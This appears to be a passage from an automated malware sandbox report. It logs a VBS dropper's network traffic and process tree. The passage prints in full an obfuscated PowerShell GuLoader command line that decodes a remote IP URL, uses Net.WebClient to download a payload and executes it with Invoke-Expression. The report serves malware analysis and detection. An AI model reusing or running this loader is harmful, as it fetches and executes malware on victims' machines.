                                Data Ascii: _8X5`k~u.2N&8O;QMJj['Ul~TVIaz$:/1P4vi^B]Hp="P\/WMKbW_4(*ZlWT-*kIsKTYeVeb$~v@%i
May 2, 2024 17:14:08.062650919 CEST | 1289 | IN | Data Raw: 53 a1 ca 5b 02 d6 76 ba d0 de d3 a6 bf ed 61 4d c1 34 f5 55 dc 22 73 96 6d 93 98 91 69 80 26 5e 61 0c ea 33 c2 1e f3 a1 e8 3d cd 6f df f4 f2 7b 1a 42 31 3d 16 eb 77 31 de b4 78 0e 07 43 a5 07 de 95 22 7c 28 cf c4 dd a3 9f b5 39 75 d9 47 ea 97 0d
                                Data Ascii: S[vaM4U"smi&^a3=o{B1=w1xC"|(9uGvIz0]Zp:O^M5lEDneM%sQe[{H5Rqi+M5X|+}Hl`vvY@N=z%A0K"
May 2, 2024 17:14:08.062717915 CEST | 1289 | IN | Data Raw: 4a 6b cb a1 e7 db d9 78 65 ec 67 c9 b5 99 dc 8b 13 50 3b 52 d6 44 5f a7 ec a5 37 9f 12 52 b4 7d 27 71 ac dc f2 56 ab 76 02 fc 80 40 33 4c 73 94 68 c1 e2 f2 85 13 37 25 9e 85 db 9d 1d a6 ae 1b 4f 80 5b f1 b6 54 a6 77 d8 a7 df c1 21 d8 db 62 23 9e
                                Data Ascii: JkxegP;RD_7R}'qVv@3Lsh7%O[Tw!b#=H@CIMK}GZHX PR$~Mvb/uGd{z16[Ay?OpW-O:s^4t~V*IVs~-B[-R
May 2, 2024 17:14:08.062731981 CEST | 1289 | IN | Data Raw: 7a e6 60 98 9d b6 01 8d 27 70 a9 8f 33 43 c8 74 f6 ba 67 41 9f 0e 13 93 e6 7d d9 f6 b1 b0 5a 0e db 92 21 27 35 fa 85 55 da a5 ea f3 d8 f4 34 09 42 83 35 97 be c7 bb 80 4c 48 4e fe fd d7 db 6d 13 7e ef 65 c6 93 6c 3b 08 e2 23 51 4d 00 92 c1 41 ab
                                Data Ascii: z`'p3CtgA}Z!'5U4B5LHNm~el;#QMA@]/YQ(`1MO^AahSK^h uuZ^!TA%!0)C`m(uMktR^gxoT;#k|*gAqy^2*NNv
May 2, 2024 17:14:08.062740088 CEST | 1289 | IN | Data Raw: 42 ed fe 6c 66 e8 06 70 54 3b 43 22 3e 4b 9a a9 c4 1a 6a 65 63 8f 80 6d 4f b0 c5 44 9f a9 e2 40 32 e3 7f c0 3b dd 7a 22 21 7a 1c 61 40 79 f9 58 0f c7 30 a1 73 63 21 39 84 17 80 bd c2 1c 17 66 b1 c8 f7 76 c1 63 7d fa 96 ff 40 a3 86 db 9e 5c c5 fe
                                Data Ascii: BlfpT;C">KjecmOD@2;z"!za@yX0sc!9fvc}@\55(8#\Zt!MX%'!;I` GlU:S mmrw'-xEzP~J2R%2$#=/~BEK6f;5|"kt@){!T^
May 2, 2024 17:14:08.231386900 CEST | 1289 | IN | Data Raw: 42 6c 23 73 50 ed 75 a2 14 17 33 48 51 88 a2 fd a1 4c e3 fe 95 46 c1 dd b6 db a7 41 17 6a 05 48 5c bf e4 73 aa 3c 50 58 ed f0 c8 67 2f c8 b4 fd 4b 52 9f b8 95 a5 ce 44 19 7a b0 70 90 be be 00 2f 1f f6 eb 0c d7 d9 23 be 04 69 a1 8f cc bd 63 bd c9
                                Data Ascii: Bl#sPu3HQLFAjH\s<PXg/KRDzp/#icN\%zUr:rY!Q(bvxQ=+s~g23\8 B0;=8m?4Z3e8P$vOd,0Z6B"PC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49725 | 34.174.122.2 | 80 | 7132 | C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 17:15:04.232594967 CEST | 564 | OUT | GET /gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I= HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-US,en;q=0.9
                                Host: www.facesofhoustontx.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
May 2, 2024 17:15:04.698895931 CEST | 626 | IN | HTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Thu, 02 May 2024 15:15:04 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Location: http://facesofhoustontx.com/gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I=
                                X-Httpd: 1
                                Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                X-Proxy-Cache: MISS
                                X-Proxy-Cache-Info: 0301 NC:000000 UP:
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0



                                Target ID:0
                                Start time:17:13:02
                                Start date:02/05/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs"
                                Imagebase:0x7ff706400000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:17:13:05
                                Start date:02/05/2024
                                Path:C:\Windows\System32\PING.EXE
                                Wow64 process (32bit):false
                                Commandline:ping google.com -n 1
                                Imagebase:0x7ff76ca40000
                                File size:22'528 bytes
                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:3
                                Start time:17:13:05
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:17:13:05
                                Start date:02/05/2024
                                Path:C:\Windows\System32\PING.EXE
                                Wow64 process (32bit):false
                                Commandline:ping %.%.%.%
                                Imagebase:0x7ff76ca40000
                                File size:22'528 bytes
                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:5
                                Start time:17:13:05
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:17:13:06
                                Start date:02/05/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c dir
                                Imagebase:0x7ff626ba0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:17:13:06
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:17:13:07
                                Start date:02/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. 
E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 
'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. 
HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:17:13:07
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:10
                                Start time:17:13:09
                                Start date:02/05/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
                                Imagebase:0x7ff626ba0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:11
                                Start time:17:13:14
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. 
E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 
'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. 
